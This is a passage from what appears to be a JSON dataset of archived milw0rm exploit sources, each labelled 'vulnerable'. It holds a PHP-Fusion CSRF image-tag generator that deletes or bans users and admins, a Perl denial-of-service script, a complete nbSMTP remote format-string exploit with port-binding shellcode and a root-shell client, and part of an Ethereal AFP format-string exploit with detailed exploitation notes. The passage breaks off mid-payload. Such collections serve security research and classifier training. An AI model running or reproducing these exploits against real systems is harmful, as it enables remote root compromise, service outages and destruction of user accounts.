if(argc < 6 )\n\n      usage();\n\n          \n\n   int i;\n\n   char cmd[512];\n\n   char option[512];\n\n   char version[512];    \n\n   \n\n   FILE *log;\n\n   log = fopen(\"exploit.txt\", \"w+\");\n\n\n\n   if(log == 0) {\n\n      printf(\"[-] Error opening log file.\\n\");\n\n      exit(-1);;              \n\n   }\n\n   \n\n   fprintf(log, \"PHP-Fusion [img][/img] exploit\\n\");\n\n   fprintf(log, \"Discovered/Coded by Easyex\\n\\n\");\n\n   \n\n   if(strcmp(argv[1], \"6.x\") == 0) {\n\n      strncpy(version, \"administration/\", 512);\n\n   }\n\n \n\n   else if(strcmp(argv[1], \"5.x\") == 0) {\n\n      strncpy(version, \"fusion_admin/\", 512);\n\n   }\n\n   \n\n   else {\n\n      printf(\"[-] Error, Invalid version!\\n\");\n\n      exit(-1);;\n\n   }      \n\n   \n\n   // There are other options you can do, This is just some of them...\n\n   \n\n   // If you need to find out a users id you can just go to members.php and click on the user you want and the id will show in the url like ?lookup=1     \n\n      \n\n   if(strcmp(argv[3], \"deluser\") == 0) {\n\n      strncpy(option, \"members.php?step=delete&sortby=all&rowstart=0&user_id=\", 512);\n\n      fprintf(log, \"You have selected to delete %s > %s user(s)\\n\", argv[4], argv[5]);\n\n   }\n\n    \n\n   else if(strcmp(argv[3], \"banuser\") == 0) {\n\n      strncpy(option, \"members.php?step=ban&act=on&sortby=all&rowstart=0&user_id=\", 512);\n\n      fprintf(log, \"You have selected to ban %s > %s user(s)\\n\", argv[4], argv[5]);\n\n   }\n\n\n\n   else if(strcmp(argv[3], \"delshout\") == 0) {\n\n      strncpy(option, \"shoutbox.php?action=delete&shout_id=\", 512);\n\n      fprintf(log, \"You have selected to delete %s > %s shoutbox post(s)\\n\", argv[4], argv[5]);\n\n   }\n\n\n\n   // We can delete any account, But we cant add admin accounts\n\n      \n\n   else if(strcmp(argv[3], \"deladmin\") == 0) {\n\n      strncpy(option, \"administrators.php?remove=\", 512);\n\n      fprintf(log, \"You have selected to delete %s > %s administator(s)\\n\", argv[4], argv[5]);\n\n   }   \n\n      \n\n   else {\n\n      printf(\"[-] Error, Invalid option!\\n\");\n\n      exit(-1);\n\n   }\n\n      \n\n   printf(\"[+] Generating image codes...\\n\\n\");\n\n   \n\n   fprintf(log, \"Add the following lines of code into your signature, forum post or in a comment post:\\n\\n\");\n\n       \n\n   for (i = atoi(argv[4]); i <= atoi(argv[5]); i++) {\n\n      sprintf(cmd, \"[img]%s%s%s%d[/img]\", argv[2], version, option, i);\n\n      fprintf(log, \"%s\\n\", cmd);\n\n   }\n\n   \n\n   printf(\"[+] Completed & logged to exploit.txt\\n\");\n\n   exit(1);   \n\n}\n\n\n\n// milw0rm.com [2005-08-05]",
725        "vulnerable": true
726    },
727    {
728        "exploit_id": 1137,
729        "content": "#!/usr/bin/perl\n\n#\n\n#  Acunetix HTTP Sniffer DOS Exploit\n\n# ------------------------------------\n\n#  Infam0us Gr0up - Securiti Research\n\n#\n\n#\n\n# Tested on Windows2000 SP4 (Win NT)\n\n# Info: infamous.2hell.com\n\n# Vendor URL: www.acunetix.com\n\n\n\n$ARGC=@ARGV;\n\nif ($ARGC !=2) {\n\n   print \"\\n\";\n\n   print \"  Acunetix HTTP Sniffer DOS Exploit\\n\";\n\n   print \"-------------------------------------\\n\\n\";\n\n   print \"Usage: $0 [remote IP] \\n\";\n\n   print \"Exam: $0 127.0.0.1\\n\";\n\n   exit;\n\n}\n\n\n\nuse IO::Socket::INET;\n\n\n\n$host=$ARGV[0];\n\n$port= \"8080\";\n\n\n\nprint \"\\n\";\n\nprint \"[+] Connect to $host..\\n\";\n\n$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp')\n\n|| die \"[-] Connection error$@\\n\";\n\nprint \"[+] Connected\\n\";\n\nsleep(1);\n\n\n\nprint \"[+] Build buffer..\\n\";\n\nsleep(1);\n\n$hostname=\"Host: $host\";\n\n$bufy='A'x50;\n\n$bufa='A'x8183;\n\n$len=length($bufy);\n\n$buff=\"GET / HTTP/1.1\\r\\n\";\n\nsleep(1);\n\n\n\nprint \"[+] Sending request..\\n\";\n\nsend($sock,$buff,0) || die \"[-] send error:$@\\n\";\n\nprint \"[+] Send DOS..\";\n\nfor($i= 0; $i < 2000000; $i++)\n\n{\n\n$buff=\" $bufa\\r\\n\";\n\nsend($sock,$buff,0) || die \"send error:$@\\n[*] Check if server D0s'ed\\n\";\n\n}\n\n\n\n$buff=\"$hostname\\r\\n\";\n\n$buff.=\"Content-Length: $len\\r\\n\";\n\n$buff.=\"\\r\\n\";\n\n$buff.=$bufy.\"\\r\\n\\r\\n\";\n\n\n\nprint \"[+] Now kill the process..\\n\";\n\nsend($sock,$buff,0) || die \"[-] send error:$@\\n\";\n\nprint \"[+] DONE..Server Out of Memory\\n\";\n\nclose($sock);\n\n\n\n# milw0rm.com [2005-08-05]",
730        "vulnerable": true
731    },
732    {
733        "exploit_id": 1138,
734        "content": "/* nbSMTP_fsexp.c\n\n *\n\n * nbSMTP v0.99 remote format string exploit\n\n * by CoKi <coki@nosystem.com.ar>\n\n *\n\n * root@nosystem:/home/coki/audi# ./nbSMTP_fsexp\n\n *\n\n *  nbSMTP v0.99 remote format string exploit\n\n *  by CoKi <coki@nosystem.com.ar>\n\n *\n\n *  Use: ./nbSMTP_fsexp [options]\n\n *\n\n *  options:\n\n *         -t <arg>    type of target system\n\n *         -r <arg>    return address\n\n *         -s <arg>    shellcode address\n\n *         -o <arg>    offset\n\n *         -l          targets list\n\n * \n\n * root@nosystem:/home/coki/audit# ./nbSMTP_fsexp -t2\n\n *\n\n *  nbSMTP v0.99 remote format string exploit\n\n *  by CoKi <coki@nosystem.com.ar>\n\n *\n\n *  [*] system                     : Slackware Linux 10.0\n\n *  [*] return address             : 0x0804d8cc\n\n *  [*] shellcode address          : 0x08053613\n\n *  [*] building evil buffer       : done\n\n *  [*] running fake smtp server   : done\n\n *\n\n *  [*] waiting...                 : 10.0.0.1:2046 connected\n\n *  [*] sending evil command...    : done\n\n *\n\n *  [*] checking for shell...      : done\n\n *\n\n *  [!] you have a shell :)\n\n *\n\n * Linux servidor 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i586 unknown unknown GNU/Linux\n\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),102(bbs)\n\n *\n\n * Tested in Slackware Linux 9.0 / 10.0 / 10.1\n\n *\n\n * by CoKi <coki@nosystem.com.ar>\n\n * No System Group - http://www.nosystem.com.ar\n\n */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <errno.h>\n\n#include <string.h>\n\n#include <getopt.h>\n\n#include <netdb.h>\n\n#include <sys/types.h>\n\n#include <sys/fcntl.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n\n\n#define SMTPD\t\t25\n\n#define BUFFERSIZE\t1024\n\n#define ERROR\t\t-1\n\n#define TIMEOUT\t\t3\n\n#define SHELL\t\t5074\n\n\n\nint connect_timeout(int sfd, struct sockaddr *serv_addr,\n\n\tsocklen_t addrlen, int timeout);\n\nint check(unsigned long addr);\n\nvoid use(char *program);\n\nvoid printlist(void);\n\nvoid shell(char *host, int port);\n\nvoid exploit(int retaddr, int shaddr);\n\n\n\n/*\n\n * Shellcode - portbind 5074 (84 bytes)\n\n * by Giuseppe Gottardi 'oveRet' <overet@securitydate.it>\n\n */\n\n\n\nchar shellcode[] = \n\n\t\"\\x6a\\x66\\x58\\x6a\\x01\\x5b\\x99\\x52\\x53\\x6a\\x02\\x89\"\n\n\t\"\\xe1\\xcd\\x80\\x52\\x43\\x68\\xff\\x02\\x13\\xd2\\x89\\xe1\"\n\n\t\"\\x6a\\x10\\x51\\x50\\x89\\xe1\\x89\\xc6\\xb0\\x66\\xcd\\x80\"\n\n\t\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x52\\x56\\x89\\xe1\\x43\\xb0\"\n\n\t\"\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49\\xcd\\x80\"\n\n\t\"\\x41\\xe2\\xf8\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\"\n\n\t\"\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\n\n\n\nstruct {\n\n\tint num;\n\n\tchar *os;\n\n\tint retaddr;\n\n\tint shaddr;\n\n}targets[] = {\n\n\t1, \"Slackware Linux 9.0\", 0x0804d4d4, 0x080531c3,\t// .dtors\n\n\t2, \"Slackware Linux 10.0\", 0x0804d8cc, 0x08053613,\t// .dtors\n\n\t3, \"Slackware Linux 10.1\", 0x0804d898, 0x08053e4e\t// .dtors\n\n\t};\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n\tchar opt, *system=NULL;\n\n\tint shaddr=0, retaddr=0, targetnum=0, offset=0, i;\n\n\n\n\tprintf(\"\\n nbSMTP v0.99 remote format string exploit\\n\");\n\n\tprintf(\" by CoKi <coki@nosystem.com.ar>\\n\\n\");\n\n\n\n\twhile((opt = getopt(argc,argv,\"r:s:t:lo:\")) != EOF) {\n\n\t\tswitch (opt) {\n\n\t\t\tcase 'r':\n\n\t\t\t\tretaddr = strtoul(optarg,NULL,0);\n\n\t\t\t\tsystem = \"unknown\";\n\n\t\t\t\tbreak;\n\n\t\t\tcase 's':\n\n\t\t\t\tshaddr = strtoul(optarg,NULL,0);\n\n\t\t\t\tbreak;\n\n\t\t\tcase 't':\n\n\t\t\t\ttargetnum = atoi(optarg)-1;\n\n\t\t\t\tif(targets[targetnum].num) {\t\t\t\t\n\n\t\t\t\t\tsystem = targets[targetnum].os;\n\n\t\t\t\t\tretaddr = targets[targetnum].retaddr;\n\n\t\t\t\t\tshaddr = targets[targetnum].shaddr;\n\n\t\t\t\t}\n\n\t\t\t\telse use(argv[0]);\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'l':\n\n\t\t\t\tprintlist();\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'o':\n\n\t\t\t\t\toffset = atoi(optarg);\n\n\t\t\t        shaddr += offset;\n\n\t\t\t        break;\n\n\t\t\tdefault:\n\n\t\t\t\tuse(argv[0]);\n\n\t\t\t\tbreak;\n\n\t\t}\n\n\t}\n\n\n\n\tif(retaddr == 0) use(argv[0]);\n\n\tif(shaddr == 0) use(argv[0]);\n\n\tif(system == NULL) {\n\n\t\tsystem = \"unknown\";\n\n\t}\n\n\n\n\tprintf(\" [*] system\\t\\t\\t: %s\\n\", system);\n\n\tprintf(\" [*] return address\\t\\t: %010p\\n\", retaddr);\n\n\n\n\tprintf(\" [*] shellcode address\\t\\t: %010p\", shaddr);\n\n\tfflush(stdout);\n\n\n\n\tif(offset) printf(\" (offset %d)\\n\", offset);\n\n\telse printf(\"\\n\");\n\n\n\n\texploit(retaddr, shaddr);\n\n}\n\n\n\nvoid exploit(int retaddr, int shaddr) {\n\n\tchar smtp[BUFFERSIZE], temp[BUFFERSIZE], recvbuf[BUFFERSIZE], host[255];\n\n\tint sock, newsock, i, reuseaddr=1;\n\n\tunsigned int bal1, bal2;\n\n\tint cn1, cn2;\n\n\tstruct sockaddr_in remoteaddr;\n\n\tstruct sockaddr_in localaddr;\n\n\tint addrlen = sizeof(struct sockaddr_in);\n\n\tstruct hostent *he;\n\n\n\n\tprintf(\" [*] building evil buffer\\t:\");\n\n\tfflush(stdout);\n\n\n\n\t/* adding pads */\n\n\tsprintf(smtp, \"553 xx\");\n\n\n\n\t/* adding return address */\n\n\tbzero(temp, sizeof(temp));\n\n\tsprintf(temp, \"%s\", &retaddr);\n\n\tstrncat(smtp, temp, 4);\n\n\tretaddr += 2;\n\n\tsprintf(temp, \"%s\", &retaddr);\n\n\tstrncat(smtp, temp, 4);\n\n\n\n\t/* adding nops */\n\n\tstrcat(smtp, \"\\x90\\x90\\x90\\x90\");\n\n\n\n\t/* adding shellcode */\n\n\tstrcat(smtp, shellcode);\n\n\n\n\tbal1 = (shaddr & 0xffff0000) >> 16;\n\n\tbal2 = (shaddr & 0x0000ffff);\n\n\n\n\tcn1 = bal2 - 14 - 2 - 8 - 4 - 84;\n\n\tcn1 = check(cn1);\n\n\tcn2 = bal1 - bal2;\n\n\tcn2 = check(cn2);\n\n\n\n\t/* adding evil string */\n\n\tsprintf(temp, \"%%%du%%7$n%%%du%%8$n\", cn1, cn2);\n\n\tstrcat(smtp, temp);\n\n\tstrcat(smtp, \"\\n\");\n\n\n\n\tprintf(\" done\\n\");\n\n\tprintf(\" [*] running fake smtp server\\t:\");\n\n\tfflush(stdout);\n\n\n\n\tlocaladdr.sin_family = AF_INET;\n\n\tlocaladdr.sin_port = htons(SMTPD);\n\n\tlocaladdr.sin_addr.s_addr = INADDR_ANY;\n\n\tbzero(&(localaddr.sin_zero), 8);\n\n\n\n\tif ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n\n\t\tperror(\" socket()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,\n\n\t\t(socklen_t)sizeof(reuseaddr)) < 0) {\n\n\t\tperror(\" setsockopt()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) {\n\n\t\tperror(\" bind()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (listen(sock, 1) < 0) {\n\n\t\tperror(\" listen()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\" done\\n\");\n\n\tprintf(\"\\n [*] waiting...\");\n\n\tfflush(stdout);\n\n\n\n\tif ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) {\n\n\t\tperror(\" accept()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) < 0) {\n\n\t\tperror(\" getpeername()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\"\\t\\t\\t: %s:%u connected\\n\", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));\n\n\tfflush(stdout);\n\n\n\n\tprintf(\" [*] sending evil command...\\t:\");\n\n\tfflush(stdout);\n\n\n\n\tbzero(temp, sizeof(temp));\n\n\tsprintf(temp, \"220\\n\");\n\n\n\n\tif (write(newsock, temp, strlen(temp)) <= 0) {\n\n\t\tperror(\" write()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (read(newsock, recvbuf, sizeof(recvbuf)) <= 0) {\n\n\t\tperror(\" read()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tbzero(temp, sizeof(temp));\n\n\tsprintf(temp, \"250\\n\");\n\n\n\n\tif (write(newsock, temp, strlen(temp)) <= 0) {\n\n\t\tperror(\" write()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (read(newsock, recvbuf, sizeof(recvbuf)) <= 0) {\n\n\t\tperror(\" read()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif (write(newsock, smtp, strlen(smtp)) <= 0) {\n\n\t\tperror(\" write()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tclose(sock);\n\n\tclose(newsock);\n\n\n\n\tprintf(\" done\\n\\n\");\n\n\tfflush(stdout);\n\n\t\t\n\n\tprintf(\" [*] checking for shell...\\t:\");\n\n\tfflush(stdout);\n\n\n\n\tsprintf(host, \"%s\", inet_ntoa(remoteaddr.sin_addr));\n\n\tsleep(1);\n\n\n\n\tshell(host, SHELL);\n\n}\n\n\n\nvoid shell(char *host, int port) {\n\n\tint sockfd, n;\n\n\tchar buff[BUFFERSIZE], *command = \"uname -a; id;\\n\";\n\n\tfd_set readfs;\n\n\tstruct hostent *he;\n\n\tstruct sockaddr_in dest_dir;\n\n\n\n\tif((he=gethostbyname(host)) == NULL) {\n\n\t\therror(\" gethostbyname()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {\n\n\t\tperror(\" socket()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tdest_dir.sin_family = AF_INET;\n\n\tdest_dir.sin_port = htons(port);\n\n\tdest_dir.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tbzero(&(dest_dir.sin_zero), 8);\n\n\n\n\tif(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,\n\n\t\tsizeof(struct sockaddr), TIMEOUT) == ERROR) {\n\n\n\n\t\tprintf(\" failed!\\n\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\" done\");\n\n\tfflush(stdout);\n\n\n\n\t/* owned ;) */\n\n\tprintf(\"\\n\\n [!] you have a shell :)\\n\\n\");\n\n\tfflush(stdout);\n\n\n\n\tsend(sockfd, command, strlen(command), 0);\n\n\n\n\twhile(1) {\n\n\t\tFD_ZERO(&readfs);\n\n\t\tFD_SET(0, &readfs);\n\n\t\tFD_SET(sockfd, &readfs);\n\n\t\tif(select(sockfd+1, &readfs, NULL, NULL, NULL) < 1) exit(0);\n\n\t\tif(FD_ISSET(0,&readfs)) {\n\n\t\t\tif((n = read(0,buff,sizeof(buff))) < 1)\n\n\t\t\texit(0);\n\n\t\t\tif(send(sockfd, buff, n, 0) != n) exit(0);\n\n\t\t}\n\n\t\tif(FD_ISSET(sockfd,&readfs)) {\n\n\t\t\tif((n = recv(sockfd, buff, sizeof(buff), 0)) < 1) exit(0);\n\n\t\t\twrite(1, buff, n);\n\n\t\t}\n\n\t}\n\n}\n\n\n\nint connect_timeout(int sfd, struct sockaddr *serv_addr,\n\n\tsocklen_t addrlen, int timeout) {\n\n\n\n\tint res, slen, flags;\n\n\tstruct timeval tv;\n\n\tstruct sockaddr_in addr;\n\n\tfd_set rdf, wrf;\n\n\n\n\tfcntl(sfd, F_SETFL, O_NONBLOCK);\n\n\n\n\tres = connect(sfd, serv_addr, addrlen);\n\n\n\n\tif (res >= 0) return res;\n\n\n\n\tFD_ZERO(&rdf);\n\n\tFD_ZERO(&wrf);\n\n\n\n\tFD_SET(sfd, &rdf);\n\n\tFD_SET(sfd, &wrf);\n\n\tbzero(&tv, sizeof(tv));\n\n\ttv.tv_sec = timeout;\n\n\n\n\tif (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)\n\n\t\treturn -1;\n\n\n\n\tif (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {\n\n\t\tslen = sizeof(addr);\n\n\t\tif (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)\n\n\t\t\treturn -1;\n\n\n\n\t\tflags = fcntl(sfd, F_GETFL, NULL);\n\n\t\tfcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);\n\n\n\n\t\treturn 0;\n\n\t}\n\n\n\n\treturn -1;\n\n}\n\n\n\nint check(unsigned long addr) {\n\n\tchar tmp[128];\n\n\tsnprintf(tmp, sizeof(tmp), \"%d\", addr);\n\n\tif(atoi(tmp) < 10)\n\n\taddr = addr + 65536;\n\n\n\n\treturn addr;\n\n}\n\n\n\nvoid use(char *program) {\n\n\tprintf(\" Use: %s [options]\\n\", program);\n\n\tprintf(\"\\n options:\\n\");\n\n\tprintf(\"\t-t <arg>    type of target system\\n\");\n\n\tprintf(\"\t-r <arg>    return address\\n\");\n\n\tprintf(\"\t-s <arg>    shellcode address\\n\");\n\n\tprintf(\"\t-o <arg>    offset\\n\");\n\n\tprintf(\"\t-l          targets list\\n\\n\");\n\n\texit(1);\n\n}\n\n\n\nvoid printlist(void) {\n\n\tint i=0;\n\n\n\n\tprintf(\" targets\\n\");\n\n\tprintf(\" -------\\n\\n\");\n\n\n\n\twhile(targets[i].num) {\n\n\t\tprintf(\" [%d] %s\\n\", targets[i].num, targets[i].os);\n\n\t\ti++;\n\n\t}\n\n\t\n\n\tprintf(\"\\n\");\n\n\texit(0);\n\n}\n\n\n\n// milw0rm.com [2005-08-05]",
735        "vulnerable": true
736    },
737    {
738        "exploit_id": 1139,
739        "content": "/*[ ethereal[v0.10.*]: (AFP) remote format string exploit. ] *********\n\n*\n\n* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n*\n\n* compile:\n\n* gcc xethereal-afp-fmt.c -o xethereal-afp-fmt\n\n*\n\n* ethereal homepage/url:\n\n* http://www.ethereal.com\n\n*\n\n* syntax:\n\n* ./xethereal-afp-fmt [-spSrPanc] -h host\n\n*\n\n* vulnerable versions:\n\n* v0.10.0 to v0.10.11 (v0.9.* and below not effected)\n\n*\n\n* fix:\n\n* packet-afp.c:1733:-proto_item_set_text(item, rep);\n\n* packet-afp.c:1733:+proto_item_set_text(item, \"%s\", rep);\n\n*\n\n* Ethereal is used by network professionals around the world for\n\n* troubleshooting, analysis, software and protocol development,\n\n* and education. It has all of the standard features you would\n\n* expect in a protocol analyzer, and several features not seen in\n\n* any other product. Its open source license allows talented\n\n* experts in the networking community to add enhancements. It runs\n\n* on all popular computing platforms, including Unix, Linux, and\n\n* Windows.\n\n*\n\n* ethereal(v0.10.0 to v0.10.11) contains a remotely exploitable\n\n* format string bug in its AFP dissector code(packet-afp.c).\n\n*\n\n* the vulnerable function is located in packet-afp.c in the\n\n* dissect_reply_afp_get_server_param() function. this function\n\n* uses the get_name() function to pluck a string(the \"volume\")\n\n* from the packet and proceeds to pass it (improperly) to\n\n* proto_item_set_text() which uses formats.\n\n*\n\n* this exploit uses the DSI/afpovertcp(548) TCP port as a means of\n\n* exploiting this. the port does NOT have to be open to exploit\n\n* this as you can send spoofed packets or connect to a different\n\n* port(explained in the next paragraph) to get the job done.\n\n*\n\n* ethereal may rely on the source port, if no dissector is found\n\n* for the destination port, to decide what dissector to use on a\n\n* packet. this means ANY destination port may be used, granted it\n\n* has no destination port dissector. (ie. port 80 won't work, but\n\n* port 1234 will)\n\n*\n\n* as for exploiting this, it is somewhat special. there is no\n\n* user-supplied data(that i found usable) on the stack to form\n\n* addresses out of, however there are many \"real\" addresses you\n\n* can use that are already there. this means you can not\n\n* use the half-number($hn) or multiple number($n) writing methods,\n\n* and you must attempt to do it in one number($n) write. people\n\n* say this isn't desired, however it worked fine for me when\n\n* testing this exploit--as if i had a choice.\n\n* \n\n* the exploit string itself is formed as follows(in heap):\n\n* <fmt string><align><addr jump x 16><nops x 64><shellcode>\n\n*\n\n* method 1 of using the exploit string(general situations):\n\n* the format string overwrites a selected address in memory to\n\n* point to the <nops> and then the <shellcode>.\n\n* to find the address(-r option) to use for this method run:\n\n* ./xethereal-afp-fmt -h <host> -r 0x08765432\n\n* then on the box running ethereal, run this on the core file:\n\n* objdump -D -s core|grep \"90909090 90909090 90909090 90909090\"\\\n\n* |head -1|awk '{print $1}'\n\n*\n\n* method 2 of using the exploit string(special situations):\n\n* the format string overwrites a selected address in memory to\n\n* point to the <addr jump> portion of the string, the <addr jump>\n\n* value is simply the [current memory location+64] which jumps to\n\n* the nops and then the shellcode.\n\n* to find the address(-r option) to use for this method run:\n\n* ./xethereal-afp-fmt -h <host> -r 0x080807c8\n\n* then on the box running ethereal, run this on the core file:\n\n* objdump -D -s core|grep \"08080808 08080808 08080808 08080808\"\\\n\n* |head -1|awk '{print $1}'\n\n*\n\n* (for both methods 1 and 2: if the address given is not %4, round\n\n* up to the next %4 address, do not round down. also, try this a\n\n* couple times to see if values are in the same place\n\n* consistantly. if i notice a less volatile/easier to predict\n\n* memory area to use in the future i will modify this exploit\n\n* accordingly)\n\n*\n\n* the pop(-P option) value must be found manually, during testing\n\n* a pop value of 45(method 2) and also 104(method 1) worked for\n\n* me. (these will most likely not work for you)\n\n*\n\n* as for the sending of the DSI/AFP packets, you must send two.\n\n* the first packet sets what the \"command\" and \"id\" number are,\n\n* the second is the reply which is where the exploitation occurs.\n\n* (note: the \"id\" number and source port must match both packets)\n\n*\n\n* i tested the following exploit on mandrake/9.2 using tethereal\n\n* v0.10.10-SVN-14182, finding the pop(-P option) value will almost\n\n* surely be different on each distribution/version(the bug is not\n\n* limited to linux, but this exploit is). if you simply desire to\n\n* see if your version of ethereal is vulnerable use the\n\n* crash(-c option) command-line option.\n\n*\n\n* example result:\n\n* ----------------------------------------------------------------\n\n* # gcc xethereal-afp-fmt.c -o xethereal-afp-fmt\n\n* # ./xethereal-afp-fmt -h dual.fakehalo.lan -r 0x082129f0 -P 45\n\n* [*] ethereal[v0.10.*]: (AFP) remote format string exploit.\n\n* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n*\n\n* [*] address : 0x082129f0\n\n* [*] sc address : 0x08212a30 (address+64, for method 2)\n\n* [*] pops : 45\n\n* [*] shell port : 7979\n\n* [*] spoofed : yes\n\n*\n\n* [*] destination : dual.fakehalo.lan:548\n\n* [*] source : <random>:548\n\n* [*] amount : 5\n\n*\n\n* [+] sending(2x packet = .): .....(done)\n\n*\n\n* [*] pause for remote processing... (10 seconds)\n\n* [*] checking to see if the exploit was successful.\n\n* [*] attempting to connect: dual.fakehalo.lan:7979.\n\n* [*] successfully connected: dual.fakehalo.lan:7979.\n\n*\n\n* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686$\n\n* uid=0(root) gid=0(root) groups=0(root)\n\n* ----------------------------------------------------------------\n\n* (using \"-p 104\" and \"-r 0x08212a30\" also worked for me)\n\n*\n\n* note: ethereal needs to be running with tree/verbose(-V option)\n\n* mode. i did not notice a problem with the snaplen(-s option)\n\n* being needed to exploit, if it was it would need to be around\n\n* 300 or more. (ie. \"tethereal -V\" should be enough)\n\n********************************************************************/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <string.h>\n\n#include <signal.h>\n\n#include <time.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n#ifdef _USE_ARPA\n\n#include <arpa/inet.h>\n\n#endif\n\n\n\n/* doesn't seem to be standardized, so... */\n\n#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)\n\n#define BYTE_ORDER __BYTE_ORDER\n\n#endif\n\n#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)\n\n#define BIG_ENDIAN __BIG_ENDIAN\n\n#endif\n\n#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)\n\n#if BYTE_ORDER == BIG_ENDIAN\n\n#define _USE_BIG_ENDIAN\n\n#endif\n\n#endif\n\n\n\n/* will never need to be changed. */\n\n#define DSI_SRC_PORT 548\n\n#define SC_JUMP 64\n\n/* change if desired. */\n\n#define DFL_AMOUNT 5\n\n#define DFL_SHELLPORT 7979\n\n#define TIMEOUT 10\n\n/* aligns post-format string. (possible modification) */\n\n#define ALIGN 8\n\n/* what is sent if the -c option is used. */\n\n#define CRASH_STR \"%s%s%s%s%s%s%s%s%n%n%n%n%n%n%n%n\"\n\n\n\n/* avoid platform-specific header madness. */\n\n/* (just plucked out of header files) */\n\nstruct iph{\n\n#ifdef _USE_BIG_ENDIAN\n\nunsigned char version:4,ihl:4;\n\n#else\n\nunsigned char ihl:4,version:4;\n\n#endif\n\nunsigned char tos;\n\nunsigned short tot_len;\n\nunsigned short id;\n\nunsigned short frag_off;\n\nunsigned char ttl;\n\nunsigned char protocol;\n\nunsigned short check;\n\nunsigned int saddr;\n\nunsigned int daddr;\n\n};\n\nstruct tcph{\n\nunsigned short source;\n\nunsigned short dest;\n\nunsigned int seq;\n\nunsigned int ack_seq;\n\n#ifdef _USE_BIG_ENDIAN\n\nunsigned short doff:4,res1:4,cwr:1,ece:1,\n\nurg:1,ack:1,psh:1,rst:1,syn:1,fin:1;\n\n#else\n\nunsigned short res1:4,doff:4,fin:1,syn:1,\n\nrst:1,psh:1,ack:1,urg:1,ece:1,cwr:1;\n\n#endif\n\nunsigned short window;\n\nunsigned short check;\n\nunsigned short urg_ptr;\n\n};\n\nstruct sumh{\n\nunsigned int saddr;\n\nunsigned int daddr;\n\nunsigned char fill;\n\nunsigned char protocol;\n\nunsigned short len;\n\n};\n\n/* keep packet values for both packets. */\n\nstruct sync_packet{\n\nunsigned int daddr;\n\nunsigned int saddr;\n\nunsigned short dest;\n\n};\n\n/* command-line argument table. */\n\nstruct{\n\nunsigned int daddr;\n\nunsigned int saddr;\n\nunsigned int addr;\n\nunsigned int pop;\n\nunsigned int amt;\n\nunsigned short port;\n\nunsigned short sport;\n\nunsigned char nospoof;\n\nunsigned char crash;\n\n}tbl;\n\n\n\n/* packet 1's purpose is to get the \"id\" number to show */\n\n/* up in the hash table and store the command(AFP_GETSRVPARAM) */\n\n/* for the reply(packet 2). (set id number) */\n\nstatic char payload1[]=\n\n/* DSI start. (packet-dsi.c) */\n\n\"\\xff\" /* unknown flag. (2-255, don't use req/resp) */\n\n\"\\x02\" /* command=command. */\n\n\"\\x00\\x00\" /* id number, must match packet2. (set later) */\n\n\"\\x00\\x00\\x00\\x00\" /* code=0, can be invalid. */\n\n\"\\x00\\x00\\x00\\x00\" /* length=0, can be invalid. */\n\n\"\\x00\\x00\\x00\\x00\" /* reserved=0, can be invalid. */\n\n/* AFP start. 